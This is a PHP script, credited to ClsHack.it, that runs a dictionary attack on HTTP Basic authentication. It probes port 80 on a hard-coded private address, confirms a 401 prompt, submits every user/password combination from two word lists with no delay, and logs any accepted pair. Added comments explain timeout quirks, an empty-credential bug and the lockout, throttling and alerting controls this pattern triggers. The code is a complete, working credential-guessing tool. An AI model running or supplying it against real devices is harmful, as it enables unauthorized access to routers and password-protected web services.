<?php
//Author:ClsHack.it
//Site:www.clshack.it :D
// Run configuration. All values are fixed at the top of the script; nothing is
// read from the command line or the environment.

// Lift PHP's execution time limit: the run lasts as long as the nested
// dictionary loops in crack() take.
set_time_limit(0);

// Word lists, read line by line by crack().
define('DICTIONARY_PASSWORD', '/home/clshack/pass.txt');
define('DICTIONARY_USERS', '/home/clshack/users.txt');

// Results log. The path is relative, so it resolves against the working
// directory. crack() writes recovered "user:password" pairs to it in clear text.
define('RESULT', 'result.log');

// TCP port probed by unreadable().
define('PORT', 80);

// Timeout in seconds, shared by the socket probe and both cURL requests.
// NOTE(review): CURLOPT_TIMEOUT is a whole-second option while this value is
// fractional; confirm which limit the cURL requests actually run under.
define('TIMEOUT', 0.6);
//output
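function write($string)
{
    // Append one line to the results log (RESULT).
    //
    // $string  text to record; a trailing "\n" is added here.
    //
    // Terminates the script with a message if the log cannot be opened.
    //
    // crack() records recovered "user:password" pairs through this function,
    // so the log is sensitive. The umask is tightened around fopen() so that a
    // newly created log is readable and writable by its owner only (0600),
    // rather than inheriting whatever the process umask allows. An existing
    // file keeps the permissions it already has.
    $previousMask = umask(0077);
    $fh = fopen(RESULT, 'a');
    umask($previousMask);

    if (!$fh) {
        die("Can't open file:".RESULT."\n\nControl file permission.");
    }

    fwrite($fh, $string."\n");
    fclose($fh);
}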
//port is open ? o.O
function unreadable($ip)
{
    // TCP reachability probe. Despite the name, the result is 1 when a
    // connection to $ip on PORT succeeds within TIMEOUT seconds and 0 when it
    // does not.
    //
    // $ip  host or address to connect to.
    //
    // Connection warnings are suppressed with @, so a failure is only visible
    // through the 0 return value. The socket is not used for anything else.
    $socket = @fsockopen($ip, PORT, $errno, $errstr, TIMEOUT);

    return $socket ? 1 : 0;
}
//is http basic authentication ? o.O
function http_basic($ip)
{
    // Ask http://$ip/ for its headers only and classify the final status code.
    //
    // Returns 1 when the answer is 401 (the resource is behind HTTP
    // authentication), 0 for anything else.
    //
    // A 200 answer means the page was served without any credentials. That is
    // echoed and written to the results log as a finding of its own.
    //
    // Redirects are followed, so the status examined is that of the last
    // response in the chain, not necessarily the first one.
    $url = "http://".$ip;

    $handle = curl_init();
    curl_setopt_array($handle, array(
        CURLOPT_URL            => $url,
        CURLOPT_HEADER         => 1,
        CURLOPT_NOBODY         => 1,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_RETURNTRANSFER => 1,
        // NOTE(review): whole-second option fed a fractional TIMEOUT; confirm
        // which limit actually applies.
        CURLOPT_TIMEOUT        => TIMEOUT,
    ));
    curl_exec($handle);
    $status = curl_getinfo($handle, CURLINFO_HTTP_CODE);
    curl_close($handle);

    if ($status == "401") {
        return 1;
    }

    if ($status == "200") {
        $line = "$url Return code 200\n";
        echo $line;
        write($line);
    }

    return 0;
}
function authentication($ip,$user,$password)
{
    // Send one header-only request to http://$ip/ with the given HTTP Basic
    // credentials.
    //
    // Returns 1 when the final status code is 200, 0 otherwise.
    //
    // The URL is plain http://, so the Basic credentials travel base64-encoded
    // but unencrypted.
    //
    // Each call is one complete request. On the server side a run of calls
    // would appear as consecutive Basic-auth attempts from the same client,
    // which is the pattern lockout and rate-limit controls act on.
    $handle = curl_init();
    curl_setopt_array($handle, array(
        CURLOPT_URL            => "http://".$ip,
        CURLOPT_HEADER         => 1,
        CURLOPT_NOBODY         => 1,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_HTTPAUTH       => CURLAUTH_BASIC,
        CURLOPT_USERPWD        => "$user:$password",
        // NOTE(review): whole-second option fed a fractional TIMEOUT; confirm
        // which limit actually applies.
        CURLOPT_TIMEOUT        => TIMEOUT,
    ));
    curl_exec($handle);
    $status = curl_getinfo($handle, CURLINFO_HTTP_CODE);
    curl_close($handle);

    return ($status == "200") ? 1 : 0;
}
function crack($ip)
{
    // Dictionary run against the Basic-auth prompt at $ip.
    //
    // For every line of DICTIONARY_USERS, every line of DICTIONARY_PASSWORD is
    // tried through authentication(). The first accepted pair is echoed and
    // written to the results log, then both loops stop. Nothing is returned.
    //
    // Terminates the script if either word list cannot be opened.
    //
    // Requests are issued back to back with no delay or retry limit. Account
    // lockout, request throttling and alerting on bursts of failed Basic-auth
    // logins from one source are the controls that bear on this pattern.
    //
    // NOTE(review): both loops test feof() before fgets(). When a list ends
    // with a newline, the last fgets() yields false, which the CR/LF stripping
    // turns into an empty string, so an empty user and an empty password are
    // also submitted.
    $users = @fopen(DICTIONARY_USERS, "r");
    if (!$users) {
        die("Can't open dictionary.\n");
    }

    $found = false;
    while (!feof($users) && !$found) {
        $user = str_replace(array("\r", "\n"), "", fgets($users));

        // The password list is reopened for each user so that it is read from
        // the start every time.
        $passwords = @fopen(DICTIONARY_PASSWORD, "r");
        if (!$passwords) {
            die("Can't open dictionary.\n");
        }

        while (!feof($passwords)) {
            $password = str_replace(array("\r", "\n"), "", fgets($passwords));

            if (authentication($ip, $user, $password)) {
                $line = "Password found ->$user:$password, ip:$ip\n";
                echo $line;
                write($line);
                $found = true;
                break;
            }
        }
        fclose($passwords);
    }

    fclose($users);
}
// Entry point: one hard-coded target in private (RFC 1918) address space.
// The dictionary run starts only if the port accepts a connection and the
// server answers 401. A server that answers 200 without credentials is logged
// by http_basic() and left alone.
$ip = "192.168.1.1";

if (unreadable($ip) && http_basic($ip)) {
    echo "$ip\n";
    crack($ip);
}
?>